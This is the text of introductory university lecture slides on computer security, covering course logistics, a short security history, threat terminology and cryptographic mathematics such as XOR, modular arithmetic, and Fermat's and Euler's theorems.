introduction to computer security cs3235 - nus …cs3235/2003-semesteri/foils.pdf · introduction...

Introduction to Computer SecurityCS3235

Hugh Anderson

CS3235 - Hugh Anderson’s notes.

Contact information

Room S15 #06-12Telephone 6874-6903E-mail [email protected]

...and Spinellis...

CS3235 - Hugh Anderson’s notes. Page number: 1

People

Dr Robert Deng, Institute for Infocomm Research

http://www.i2r.a-star.edu.sg/icsd/staff/Robert/


http://www.i2r.a-star.edu.sg/icsd/staff/Robert/

Official SOC description

With the widespread use of computers and Internet as well as electronic com-merce, computer security becomes more and more important. The objectiveof this module is to give students basic knowledge of computer security. Thismodule covers the following topics: threats to computer systems, network se-curity fundamentals, security in a layered protocol architecture, authenticationin computer systems, access control, intrusion detection, security architectureand frameworks, lower layers security protocols, upper layer security proto-cols, electronic mail and EDI security, directory systems security, Unix systemssecurity, security evaluation criteria.


Assessment

Assessment Weighting Grade

Assignments 35%

Tutorials 5%

Mid-term Closed book 10%

Final Exam Open Book 50%

Total marks 100%


Resources

Computer Security: Art and Science, Matt Bishop

The notes are expanded versions of the overheads

Directed readings - all available on the Internet.

IVLE at http://ivle.nus.edu.sg/

Web site at http://www.comp.nus.edu.sg/˜cs3235


http://ivle.nus.edu.sg/

http://www.comp.nus.edu.sg/~cs3235

Comparison

Different focus

More introductory and practical material

Less material duplicated


Topics - general

History and background,

Preliminaries

Encoding and decoding

Protocols used for security.


Topics - detail

• Mathematical, physical, legal (2 lectures)

• Security models (1 lecture)

• Secrecy (1 lecture)

• Insecurity (2 lectures)

• Safety/control hardware/software (2 lectures)

• Assurance (1 lecture)

• Protocols (1 lecture)

• + Case studies


Tutorials

Start in 3rd week

More details next week


My expectation...

Attend classes and tutorials

Ask if you don’t know

Read notes, book, and the readings...

Get interested in the subject


Chapter 1

Lecture 1 - Introduction


Jump-about-introduction

...sorry sorry...


The History of Herodotus

For Histiæus, when he was anxious to give Aristagoras orders torevolt, could find but one safe way, as the roads were guarded,of making his wishes known; which was by taking the trustiestof his slaves, shaving all the hair from off his head, and thenpricking letters upon the skin, and waiting till the hair grew again.Thus accordingly he did; and as soon as ever the hair was grown,he despatched the man to Miletus, giving him no other messagethan this- "When thou art come to Miletus, bid Aristagoras shavethy head, and look thereon." Now the marks on the head, as Ihave already mentioned, were a command to revolt...


The History of Herodotus

Histiæus ensured confidentiality

Used again by Germany in the 1914-1918 war

This is now called steganography


More history

Cæsar encoded messages - cryptography

Agreed protocols to ensure correct conduct of a war

Examples taken from the world of warfare


Aspects to “computer security”

Security problems in society reoccur in computers

Confidentiality = locks/encoding.

Integrity = handshakes/signatures

Computer versions much faster.

In this course, security includes wider aspects.


Terms: Services

Three aspects of security services:

• confidentiality : concealing information - resources;

• integrity : trustworthiness of data - resources;

• availability : preventing denial-of-service.


Terms: Threats

Alice Bob

Ted

Snooping


Terms: Threats

Alice Bob

Ted

Man in the middle


Terms: Threats

Alice Bob

Ted

Denial of service


Terms: Threats

Alice Bob

Ted

Spoofing


Terms: Threats

• disclosure : unauthorized access (snooping);

• deception : accept false data (man-in-the-middle);

• disruption : prevent correct operation (denial-of-service);

• usurpation : unauthorized control (spoofing).


Terms: Policy and mechanism

We differentiate between a security policy and a securitymechanism:

• policy : what is allowed/disallowed;

• mechanism : ways of enforcing a policy


NUS IT policy

For example, at NUS, we have an IT policy which includesa range of clauses regarding security concerns, such as:

4.2 Undermining System Integrity

Users must not undermine the security of the IT Re-sources, for example, by cracking passwords or tomodify or attempt to modify the files of other Usersor software components of the IT Resources.


NUS mechanisms

6.3 Use Of Security Scanning Systems

Users consent to the University’s use of scanning pro-grams for security purposes at system level for com-puters and systems that are connected to the Univer-sity’s network. This is to ensure that any computersor systems attached to the network will not become alaunching pad for security attack and jeopardise the ITResources. System level scanning includes scanningfor security vulnerabilities and virus detection on emailattachments. Users’ files and data are excluded fromthe scanning.


Topic: Preliminaries

Review some mathematical concepts. XOR, modulo,primes

The textbook, and my notes should be enough.

Physical laws and procedures. Information and Entropy


Topic: Security models

These models provide formal ways of looking at computersecurity in an abstract manner.

1. Define a model, and

2. prove it secure

3. Ensure system complies with model



• The Bell-LaPadula model (no read-up, no write-down)provides a military viewpoint to assure confidentiality ser-vices.

• The Biba and Clark-Wilson models attempt to model thetrustworthiness of data and programs, providing assur-ance for integrity services.

... Read ahead ...



Determine properties of the model, and

Verify that implementations are valid.

Basis of trusted operating systems

Modelling for availability is tricky


Topic: Secrecy

Commerce relies on secure transfer of information, and

Often just want things to be secret

Distance between you and an attacker is shrinking

Criminals have an access point into your living room


2000 years ago...

Replace each Roman letter in a message, with another Ro-man letter, obtained by rotating the alphabet some numberof characters:

I C L A V D I V S

A B C D E F G H I K L M N O P Q R S T V X Y Z

V X Y Z A B C D E F G H I K L M N O P Q R S T

E Y G V Q Z E Q O

We can specify a Cæsar cipher by just noting the number ofcharacters that the alphabet is rotated.


60 years ago...


60 years ago


Enigma machines

Commercial device

Used by the German military

Belief that could not be decoded.


Enigma machines


Hacking Enigma

Americans captured a German submarine?

Alan Turing did it all?

Hard workers at Bletchley Park?

My dad?


Hacking Enigma

1928: Poles intercepted a machine

1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski.

Decoded some messages

German army using an extra level of encoding

French spies uncovered the extra encoding


Hacking Enigma

1933-1939: the Polish Ciphers Office was able to decodemessages, although slowly.

July 1939: Poland gave Enigma copies to English

Bletchley Park

May 1941: English captured the U-110 submarine, com-plete with a genuine Enigma machine, and code books.


Hacking Enigma

1941-45: English could decode most German militarytransmissions.

1941-45: developed a hardware system

Precursor to modern-day computers


Today...sssshhhh

Secure encrypted communications between

two untrusted hosts over an insecure network.

Other connections can also be forwarded

Users must prove their identity to the remote machine


Secure-shell

Based on public-key cryptography:

Encryption and decryption use separate keys not possible to derive one from other RSA is one such system.

Encodings believed to be difficult to decode, and

protocols of message exchange that are believed to besecure.


Topic: Insecurity

Systems dangerously easy to subvert

Adversary gains control over your system

You sign a contract, and other party doesn’t.

Investigate hacking and reducing risk


Topic: Insecurity

A locked air-conditioned room with file server:

• The lock can be picked, or the door kicked in.

• The console of the server computer may be passwordprotected, but

– it may be rebooted with a different disk.


Topic: Insecurity

• The reboot process may be (BIOS) password protected,but

– the case of the computer may be opened and the diskremoved.

• And so on...


Topic: Insecurity

Tempest - computer screen monitoring

Paper

http://jya.com/emr.pdf

Overcoming

http://www.cs.rice.edu/˜dwallach/courses/comp527 s2000/ih98-tempest.pdf

Monitor screens at a distance of 1km for $15.



http://www.cs.rice.edu/~dwallach/courses/comp527_s2000/ih98-tempest.pdf

Topic: Insecurity

Kick in doors without even using your feet


Topic: Insecurity

Non-repudiation for e-commerce:

• the buyer cannot order an item and then deny the ordertook place;

• the seller cannot accept money or an order and then laterdeny that this took place.


Topic: Insecurity

Intrusive hacking is common on the Internet.

Farms of subservient machines:

At first, it looked as if some students at the Flint HillSchool, a prep academy in Oakton, Va., had found alucrative alternative to an after-school job...


Topic: Insecurity

Virusses: boot-sector hide their code in the boot sectorof a disk.

the stoned virus for DOS, written by a student fromNew Zealand!

A virus contains code that replicates, attaching itself toa program, boot sector or document. Some viruses dodamage as well.


Topic: Insecurity

Worm is a program that makes copies of itself, transferringitself around. The Morris worm in 1988:

On the evening of 2 November 1988, someone in-fected the Internet with a worm program. That pro-gram exploited flaws in utility programs in systemsbased on BSD-derived versions of UNIX. The flaws al-lowed the program to break into those machines andcopy itself, thus infecting those systems.


The Morris Worm

This program eventually spread to thousands of ma-chines, and disrupted normal activities and Internetconnectivity for many days.

ftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z

The author of the worm, Robert Morris, was convicted andfined $10,050 in 1990, and is currently a professor in theParallel and Distributed Operating Systems group at MIT,lecturing in distributed systems areas.



Topic: Protocols

Some aspects of security are determined by the way inwhich we do things (the protocol), rather than what is ac-tually done.


Topic: Protocols


Summary of topics

In this section, we introduced the following topics:

• An introduction to computer security

• Some definitions


Further study

• Textbook Chapter 1

• Monitoring computer screenshttp://jya.com/emr.pdf

• Overcoming Tempest monitoringhttp://www.cs.rice.edu/˜dwallach/courses/comp527 s2000/ih98-tempest.pdf

• The Morris wormftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z

• Military mathematical modelling of securityhttp://80-ieeexplore.ieee.org.libproxy1.nus.edu.sg/xpl/tocresult.jsp?isNumber=13172



http://www.cs.rice.edu/~dwallach/courses/comp527_s2000/ih98-tempest.pdf


http://80-ieeexplore.ieee.org.libproxy1.nus.edu.sg/xpl/tocresult.jsp?isNumber=13172

Done!


Chapter 2

Lecture 2 - Preliminaries


Note: CORS

You should be getting your tutorial sessions sorted out usingCORS!

http://www.cors.nus.edu.sg/


Overheads and notes

You can find all sorts of stuff looking in

http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/


Question box

If you have any questions, feel free to place them in thequestion box...

Or stick your hand up...

Or...


Last session

Introduction, setting context

Definitions

Cæsar cipher, Enigma, Secure shell

Insecurity


This session

• Finish context

• Math preliminaries

– XOR– Logarithms– Fields and groups


This session

• Finish context




Diagram for BAG


Safety/control software

A naive approach to security might involve attempting to en-sure that all programs that run on a computer are safe, andthat all users of computer systems are trustworthy .

Checking even one program is a non-trivial task.

The computer operating system normally provides somelevel of software and hardware security for computer sys-tems, combined with some level of user authorization.


Safety/control software

User authorization means passwords!

Systems have grown in complexity over the years.

An article shows the changes in the UNIX mechanism


Hardware security

Hardware security in operating systems has been stud-ied in CS2106 (Operating Systems) and other courses.The Kernel/Supervisor bit, processor ring0, memory protec-tion/mapping hardware and so on are all examples of hard-ware security systems intended to co-operate with the OSto enhance system security.

Software security in operating systems takes many forms.The forms range from ad-hoc changes to operating systemsto fix security loopholes as they are found, through to oper-ating systems built from the ground up to be secure.


Example: network security

TCP wrappers:

Attacks through poorly controlled TCP or UDP ports. Wrapper provides single point of control Default installation disables all access Re-enable on a case-by-case basis.


OS security

NSA have a security-enhanced Linux system:

This version of Linux has a strong, flexible mandatoryaccess control architecture incorporated into the ma-jor subsystems of the kernel. The system providesa mechanism to enforce the separation of informationbased on confidentiality and integrity requirements.

You can read about SELinux at

http://www.nsa.gov/selinux/index.html


http://www.nsa.gov/selinux/index.html

OS security

Java virtual machine has built-in security model

Microsoft point out that the Linux security model isweak...

Every member of the Windows NT family since Win-dows NT 3.5 has been evaluated at either a C2 levelunder the U.S. Government’s evaluation process or ata C2-equivalent level under the British Government’sITSEC process. In contrast, no Linux products arelisted on the U.S. Government’s evaluated product list.


Topic: Assurance

How can we convince ourselves (or our employer) that thecomputer system is to be trusted?

Building assurance is best done by adopting formal meth-ods to confirm, specify and verify the behaviour of systems.


ITSEC and CC

UK, Germany, France, Netherlands produced Informa-tion Technology Security Evaluation Criteria (ITSEC).

IT Security Evaluation Manual (ITSEM) specifiesmethodology for evaluation.

Common Criteria for Information Technology SecurityEvaluation is ITSEC, CTCPEC (Canadian Criteria) andUS Federal Criteria

Accepted by the ISO (ISO15408).


ITSEC

In an article, elements of the first certification of a smart-card system under the European ITSEC level 6 certificationare outlined.

This process involved verification of the specification with in-dependent systems, and a formal process for the implemen-tation, deriving it from the specification using the refinementprocess.


Math preliminaries

This chapter and the following chapter are copied ver-batim from the ”The Laws of Cryptography with JavaCode”, with permission from Prof Neal Wagner. Thebook is well worth reading and contains a lot of infor-mation that is relevant to this course. You can find thebook at

http://www.cs.utsa.edu/˜wagner/lawsbookcolor/laws.pdf


http://www.cs.utsa.edu/~wagner/lawsbookcolor/laws.pdf

Exclusive-Or

Law XOR-1:The cryptographer’s favorite function is Exclusive-Or .

Exclusive-Or comes up constantly in cryptography.

Same as addition mod 2


Exclusive-Or

Also as xor or a plus sign in a circle, ⊕.

The expression a⊕ b means either a or b but not both.

Ordinary inclusive-or in mathematics means either oneor the other or both.

The exclusive-or function in C / C++ / Java for bit stringsas a hat character: ^ .


Exclusive-Or for 1-bit

Exclusive-Ora b a⊕ b

0 0 00 1 11 0 11 1 0


Exclusive-Or

Message A B C

m 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .

Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .

K(m) = m⊕ k 0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .

K(m) R ’ z


Exclusive-Or

K(m) R ’ z

0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .

Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .

m = K(m)⊕ k 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .

Message A B C

If the bit-stream is random, and not known to an eavesdrop-per, then this is the most secure system. It is known as aone-time-pad.


Properties of XOR

a⊕ a = 0a⊕ 0 = aa⊕ 1 =∼ a, where ∼ is bit complement.a⊕ b = b⊕ a (commutativity)a⊕ (b⊕ c) = (a⊕ b)⊕ c (associativity)a⊕ a⊕ a = aif a⊕ b = c, then c⊕ b = a and c⊕ a = b.


Reminder

Exchange the values in two variables a and b

temp = a;a = b;b = temp;


Exchange using XOR

a = a xor b;b = a xor b;a = a xor b;

a′ = a⊕ b

b′ = (a⊕ b)⊕ b = a

a′′ = (a⊕ b)⊕ a = b


Logarithms

Law LOG-1:The cryptographer’s favorite logarithm is log base 2 .

y = logb x is the same as by = x

b(logb x) = x

Logarithm is inverse of exponential.


Logarithms

Use logs base 2 in cryptography.

y = log2 x is the same as 2y = x

210 = 1024 is the same as log2 1024 = 10.

2y > 0 for all y, and

log2 x is not defined for x ≤ 0.


Properties of logs

log2(ab) = log2 a + log2 b, for all a, b > 0log2(a/b) = log2 a− log2 b, for all a, b > 0log2(1/a) = log2(a−1) = − log2 a, for all a > 0log2(ar) = r log2 a, for all a > 0, rlog2(a + b) = (Oops! No simple formula for this.)


Examples

Logarithms base 2

x = 2y = 2log2 x y = log2 x

1, 073, 741, 824 30

1, 048, 576 20

1, 024 10

8 3

4 2

2 1

1 0


Examples

Logarithms base 2

x = 2y = 2log2 x y = log2 x

1 0

1/2 −1

1/4 −2

1/8 −3

1/1, 024 −10

0 −∞< 0 undefined


Natural logs

A log base 2 is just a fixed constant times a natural log:

log2 x = loge x/ loge 2, (mathematics)

= Math.log(x)/Math.log(2.0); (Java).

The magic constant is:

loge 2 = 0.69314 71805 59945 30941 72321, or 1/ loge 2 = 1.44269 50408 88963 40735 99246.


Proof of formula

2y = x, or y = log2 x (then takeloge of each side)

loge(2y) = loge x (then use properties of logarithms)

y loge 2 = loge x (then solve for y)

y = loge x/ loge 2 (then substitutelog2 x for y)

log2 x = loge x/ loge 2.


Bits to represent

Law LOG-2:The log base 2 of an integer x tells how many bits it takes

to represent x in binary.

Thus log2 10000 = 13.28771238, so it takes 14 bits to repre-sent 10000 in binary. (In fact, 1000010 = 100111000100002.)Exact powers of 2 are a special case: log2 1024 = 10, but ittakes 11 bits to represent 1024 in binary, as 100000000002.

Similarly, log10(x) gives the number of decimal digitsneeded to represent x.


Groups

A group is

a set of group elements with a binary operation f

If one denotes the group operation by #, then the abovesays that for any group elements a and b, a#b is definedand is also a group element.


Groups

Groups

are associative, meaning that a#(b#c) = (a#b)#c have an identity element e satisfying a#e = e#a = a

for any group element a. have an inverse a′ any element a satisfying a#a′ =

a′#a = e.


Groups

If a#b = b#a for all group elements a and b, the group iscommutative.

Otherwise it is non-commutative. Notice that even in anon-commutative group, a#b = b#a might sometimesbe true — for example if a or b is the identity.

A group with only finitely many elements is called finite;otherwise it is infinite.


Examples

• The integers (all whole numbers, including 0 and nega-tive numbers) form a group using addition. The identityis 0 and the inverse of a is −a.

– This is an infinite commutative group.

• The positive rationals (all positive fractions, including allpositive integers) form a group if ordinary multiplicationis the operation. The identity is 1 and the inverse of r is1/r = r−1.

– This is another infinite commutative group.


Examples

• The integers mod n form a group for any integer n > 0.This group is often denoted Zn. Here the elements are0, 1, 2, . . ., n − 1 and the operation is addition followedby remainder on division by n. The identity is 0 and theinverse of a is n−a (except for 0 which is its own inverse).

– This is a finite commutative group.


Non-commutative Group

Consider 2-by-2 non-singular matrices of real numbers(or rationals), where the operation is matrix multiplication:(

a bc d

). Here a, b, c, and d are real numbers (or ratio-

nals) and ad− bc must be non-zero. Inverse is

1ad− bc

(d −b

−c a

)

and the identity is(

1 00 1

). This is an infinite non-

commutative group.


Groups

Law GROUP-1:The cryptographer’s favorite group is the integers mod n ,

Zn.

In the special case of n = 10, the operation of addition inZ10 can be defined by (x + y) mod 10, that is, divide by 10and take the remainder.


Integers modulo 10

+ 0 1 2 3 4 5 6 7 8 90 0 1 2 3 4 5 6 7 8 91 1 2 3 4 5 6 7 8 9 02 2 3 4 5 6 7 8 9 0 13 3 4 5 6 7 8 9 0 1 24 4 5 6 7 8 9 0 1 2 35 5 6 7 8 9 0 1 2 3 46 6 7 8 9 0 1 2 3 4 57 7 8 9 0 1 2 3 4 5 68 8 9 0 1 2 3 4 5 6 79 9 0 1 2 3 4 5 6 7 8


Fields

A field has two operations

+, with elements of the field forming a commutativegroup. Identity is 0 and inverse of a is −a.

∗, with elements of the field except 0 forming anothercommutative group, identity denoted by 1 and inverseof a denoted by a−1.


Fields

There is also the distributive identity, linking + and ∗ :

a ∗ (b + c) = (a ∗ b) + (a ∗ c)

Exclude divisors of zero, that is, non-zero elementswhose product is zero.

Equivalent to the following cancellation property: if c isnot zero and a ∗ c = b ∗ c, then a = b.


Examples

The rational numbers (fractions) Q, or the real numbersR, or the complex numbers C, using ordinary additionand multiplication (extended in the last case to the com-plex numbers).

These are all infinite fields.


Example: integers mod p

The integers mod p, denoted Zp, where p is a prime num-ber (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, . . . ).

A group using +. Elements without 0 form a group under ∗. The identity is clearly 1, but the inverse of a non-zero element a is not obvious.


Integers mod p inverse

In Java, inverse must be x satisfying (x ∗ a)%p == 1.

Find x using the extended Euclidean algorithm:

p is prime and a is non-zero, the greatest commondivisor of p and a is 1.

The extended Euclidean algorithm gives x and y sat-isfying x ∗ a + y ∗ p = 1, or x ∗ a = 1− y ∗ p,

and x is the inverse of a.


Field

Law FIELD-1:The cryptographer’s favorite field is the integers mod p ,

denoted Zp , where p is a prime number.

The above field is the only one with p elements. In otherwords, the field is unique up to renaming its elements,meaning that one can always use a different set of sym-bols to represent the elements of the field, but it will still beessentially the same.


Another Field

Law FIELD-2:The cryptographer’s other favorite field is GF(2n).

A finite field with pn elements for any integer n > 1, de-noted GF (pn).

Useful in cryptography with p = 2, that is, with 2n ele-ments for n > 1.

The case 28 = 256 is used, for example, in the new U.S.Advanced Encryption Standard (AES).


Fermat’s Theorem

Law FERMAT-1:The cryptographer’s favorite theorem is Fermat’s Theorem.

In cryptography, one often wants to raise a number to apower, modulo another number.

For the integers mod p where p is a prime (denoted Zp),there is a result know as Fermat’s Theorem, discoveredby the 17th century French mathematician Pierre de Fer-mat, 1601-1665.


Fermat’s theorem

Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then

ap−1 mod p = 1


Fermat’s theorem

p a a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12

13 2 2 4 8 3 6 12 11 9 5 10 7 1

13 3 3 9 1 3 9 1 3 9 1 3 9 1

13 4 4 3 12 9 10 1 4 3 12 9 10 1

13 5 5 12 8 1 5 12 8 1 5 12 8 1

13 6 6 10 8 9 2 12 7 3 5 4 11 1

13 7 7 10 5 9 11 12 6 3 8 4 2 1

13 8 8 12 5 1 8 12 5 1 8 12 5 1

13 9 9 3 1 9 3 1 9 3 1 9 3 1

13 10 10 9 12 3 4 1 10 9 12 3 4 1

13 11 11 4 5 3 7 12 2 9 8 10 6 1

13 12 12 1 12 1 12 1 12 1 12 1 12 1


Fermat’s theorem

For p = 13 the value is always 1 by the time the powergets to 12

Sometimes the value gets to 1 earlier

Lengths of runs are always numbers that divide evenlyinto 12

A value of a for which the whole row is needed is calleda generator . 2, 6, 7, and 11 are generators.


Summary of topics

In this section, we introduced “Cryptographers favorites”


Further study

• The Laws of Cryptography with Java Codehttp://www.cs.utsa.edu/˜wagner/lawsbookcolor/laws.pdf


http://www.cs.utsa.edu/~wagner/lawsbookcolor/laws.pdf

Chapter 3



Overheads and notes

You can find all sorts of stuff looking in



Question box

If you have any questions, feel free to place them in thequestion box...

Or stick your hand up...

Or...


Last session

• Finish context




Recap - exclusive-or

Law XOR-1:The cryptographer’s favorite function is Exclusive-Or .

Message A B C

m 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .

Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .

K(m) = m⊕ k 0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .

K(m) R ’ z


Exclusive-Or

K(m) R ’ z

0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .

Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .

m = K(m)⊕ k 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .

Message A B C

If the bit-stream for the key k is random, and not known toan eavesdropper, then this is the most secure system. It isknown as a one-time-pad.


Another diagram

XPKi[P]P

X(Plaintext)(Plaintext)

KiKi

(Compare with previous representations).


Logarithms

Law LOG-1:The cryptographer’s favorite logarithm is log base 2 .

y = logb x is the same as by = x

b(logb x) = x

Logarithm is inverse of exponential.


Groups

A group is

a set of group elements with a binary operation

Law GROUP-1:The cryptographer’s favorite group is the integers mod n ,

Zn.


Fields

A field has two operations

+, with elements forming a commutative group. ∗, with elements\0 forming another group,

Law FIELD-1:The cryptographer’s favorite field is the integers mod p ,

denoted Zp , where p is a prime number.

Law FIELD-2:The cryptographer’s other favorite field is GF(2n).


This session


– Fermat’s little theorem– Euler


This session




Fermat’s theorem

Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then

ap−1 mod p = 1


Fermat’s theorem, p = 13

p a a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12

13 2 2 4 8 3 6 12 11 9 5 10 7 1

13 3 3 9 1 3 9 1 3 9 1 3 9 1

13 4 4 3 12 9 10 1 4 3 12 9 10 1

13 5 5 12 8 1 5 12 8 1 5 12 8 1

13 6 6 10 8 9 2 12 7 3 5 4 11 1

13 7 7 10 5 9 11 12 6 3 8 4 2 1

13 8 8 12 5 1 8 12 5 1 8 12 5 1

13 9 9 3 1 9 3 1 9 3 1 9 3 1

13 10 10 9 12 3 4 1 10 9 12 3 4 1

13 11 11 4 5 3 7 12 2 9 8 10 6 1

13 12 12 1 12 1 12 1 12 1 12 1 12 1


Fermat’s theorem, p = 13

Lengths of runs are always numbers that divide evenlyinto 12

A value of a for which the whole row is needed is calleda generator . 2, 6, 7, and 11 are generators.


An interesting observation..

Because a to a power mod p always starts repeating afterthe power reaches p− 1, you can do this:

ax mod p = ax mod (p−1) mod p.

Thus modulo p in the expression requires modulo p − 1 inthe exponent. For p = 13 as above, then

a29 mod 13 = a29 mod 12 mod 13 = a5 mod 13.


Another example

result = 71215 mod 13


Another example

result=

62247027506732273704655645590797926890623986483292191309020787710924

86991072740587065198907810173838994978267934813009677708927826601313

55777365361484044783800851222817392261341421370762400507026834564501

61478881858016233581815507729190060733863810985820998417753776670372

86814739670120315712396914000184822340352355906455155667534102473964

53541377412583676260706359331048403293779053704648771069764131865422

62299505280557584280574185802694213299802280179325494560628948940739

34448228464915119714116869895958794732024285742690180232449402567101

05083114967356334295809219455711191131246974627173111242792554453321

16504914530077241996189357298508605206780120789880835525222341940514

58556732086842042388893209157040799864871901064991230860288657545878

54838031902109935110264503891544145872580747830622294066978047059698

08888224976779404912792017633095411318555938776800816778624695807909\

49705787192596277127796303487781814106147375370904627195995589087276

8469943 mod 13 = 5


How did I work that out?

I used bc

An arbitrary precision calculator language


Another example



Another example


= 71215 mod 12 mod 13


Another example


= 71215 mod 12 mod 13

= 73 mod 13


Another example


= 71215 mod 12 mod 13

= 73 mod 13

= 343 mod 13


Another example


= 71215 mod 12 mod 13

= 73 mod 13

= 343 mod 13

= 5


Summary

We can do BIG NUMBER maths without calculating bignumbers.


This session




Euler

The Swiss mathematician Leonhard Euler (1707-1783) dis-covered a generalization of Fermat’s Theorem which willlater be useful in the discussion of the RSA cryptosystem.


Euler’s theorem

Theorem (Euler): If n is any positive integer and a is anypositive integer less than n with no divisors in common withn, then

aφ(n) mod n = 1,

where φ(n) is the Euler phi function:

φ(n) = n(1− 1/p1) . . . (1− 1/pm),

and p1, . . . , pm are all the prime numbers that divide evenlyinto n, including n itself in case it is a prime.


Special case 1

If n is a prime, then using the formula,

φ(n) = n(1− 1/n) = n(n− 1

n) = n− 1

Fermat’s result is a special case of Euler’s.

aφ(n) mod n = an−1 mod n = 1


Special case 2

Another special case needed for RSA comes when themodulus is a product of two primes: n = pq. Then

φ(n) = n(1− 1/p)(1− 1/q) = (p− 1)(q − 1)


Special case 2

a(p−1)(q−1) mod pq = 1

• assuming a has no divisors in common with pq

• and p and q are primes


Euler: n = 15 and φ(n) = 8

a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12 a13 a14

2 4 8 1 2 4 8 1 2 4 8 1 2 4

3 9 12 6 3 9 12 6 3 9 12 6 3 9

4 1 4 1 4 1 4 1 4 1 4 1 4 1

5 10 5 10 5 10 5 10 5 10 5 10 5 10

6 6 6 6 6 6 6 6 6 6 6 6 6 6

7 4 13 1 7 4 13 1 7 4 13 1 7 4

8 4 2 1 8 4 2 1 8 4 2 1 8 4

9 6 9 6 9 6 9 6 9 6 9 6 9 6

10 10 10 10 10 10 10 10 10 10 10 10 10 10

11 1 11 1 11 1 11 1 11 1 11 1 11 1

12 9 3 6 12 9 3 6 12 9 3 6 12 9

13 4 7 1 13 4 7 1 13 4 7 1 13 4

14 1 14 1 14 1 14 1 14 1 14 1 14 1


Table

Table illustrates Euler’s theorem for n = 15 = 3 · 5, with

φ(15) = 15 · (1− 1/3) · (1− 1/5) = (3− 1) · (5− 1) = 8

Notice here that a 1 is reached when the power is 8, butonly for numbers with no divisors in common with 15.

For other base numbers, the value never gets to 1.


Euler

Arithmetic in the exponent is taken mod φ(n), so that, if ahas no divisors in common with n,

ax mod n = ax mod φ(n) mod n.

If n = 15 as above, then φ(n) = 8, and if neither 3 nor 5divides evenly into a, then φ(n) = 8. Thus for example,

a28 mod 15 = a28mod 8 mod 15 = a4 mod 15.


Before we leave Euler...

We are interested in...

Large prime numbers (p, q)

Their product n = pq

The Euler phi function φ(n) = (p− 1)(q − 1)



In a similar fashion to before we can do BIG numberarithmetic easily

Consider also the ease of multiplying, and difficulty offactoring...



29*37=?


The Euclidean algorithm

Multiplicative inverse is not intuitive and requires sometheory to compute.

a−1 can be computed efficiently using the extended Eu-clidean algorithm

Law GCD-1:The cryptographer’s first and oldest favorite algorithm is

the extended Euclidean algorithm , which computes the greatestcommon divisor of two positive integers a and b and also sup-plies integers x and y such that x*a + y*b = gcd(a, b) .


Finding GCD

• For the gcd of 819 and 462,

– factor the numbers as:∗ 819 = 3 · 3 · 7 · 13∗ 462 = 2 · 3 · 7 · 11

– gcd is 21 = 3 · 7

But there is no efficient algorithm to factor integers.


The Euclidean algorithm

1. Repeatedly divide the larger one by the smaller , and

2. Write larger = smaller * quotient + remainder

3. Repeat using the two numbers “smaller ” and “remainder ”.

4. When you get a 0 remainder , then you have the gcd ofthe original two numbers.


Example

819 = 462 · 1 + 357 (Step 0)

462 = 357 · 1 + 105 (Step 1)

357 = 105 · 3 + 42 (Step 2)

105 = 42 · 2 + 21 (Step 3, so GCD = 21)

42 = 21 · 2 + 0 (Step 4)


The extended Euclidean algorithm

Given the two positive integers 819 and 462, the extendedEuclidean algorithm finds unique integers a and b so that

a · 819 + b · 462 = gcd(819, 462) = 21

In this case,(−9) · 819 + 16 · 462 = 21

(See notes...)

How does this give us a mechanism to calculate the mul-tiplicative inverse of an element?



x ∗ a + y ∗ p = gcd(x, y)

Now - if p is a prime, then gcd(x, y) = 1, and so

x ∗ a + y ∗ p = 1

In the field Zp, this indicates that x ∗ a = 1, and so x = a−1.

The extended Euclidean algorithm has given us a mecha-nism to calculate the multiplicative inverse of an element.


Fast integer exponentiation

Law EXP-1:Many cryptosystems in modern cryptography depend on

a fast algorithm to perform integer exponentiation.

Examples in notes... not so important, just nice to know itcan be done.


Back to primes

For 2500 years mathematicians studied prime numbers justbecause they were interesting, without any idea they wouldhave practical applications. Possible real-world uses:

1. Sometimes... a prime number of ball bearings arrangedin a bearing, to cut down on periodic wear (also gearteeth).

2. Possibly... the 13 and 17-year periodic emergence of ci-cadas may be due to coevolution with predators (that lostand became extinct).


Since 1976

Now finally, in cryptography, prime numbers have come intotheir own.

Law PRIME-1:A source of large random prime integers is an essential

part of many current cryptosystems.


Checking for primes

It is hard to check that an integer is “certainly” prime,but...

It is easy to check that an integer is “probably” prime.

Tests to check if a number is probably prime are calledpseudo-prime tests.


Prime check

Start with a property of a prime number, such as Fer-mat’s Theorem, mentioned in the previous chapter

if p is a prime and a is any non-zero number less than p,then ap−1 mod p = 1.

If one can find a number a for which Fermat’s Theoremdoes not hold, then the number p in the theorem is defi-nitely not a prime.

If the theorem holds, then p is called a pseudo-prime withrespect to a, and it might actually be a prime.


Prime check

So the simplest possible pseudo-prime test would just takea small value of a, say 2 or 3, and check if Fermat’s Theoremis true.

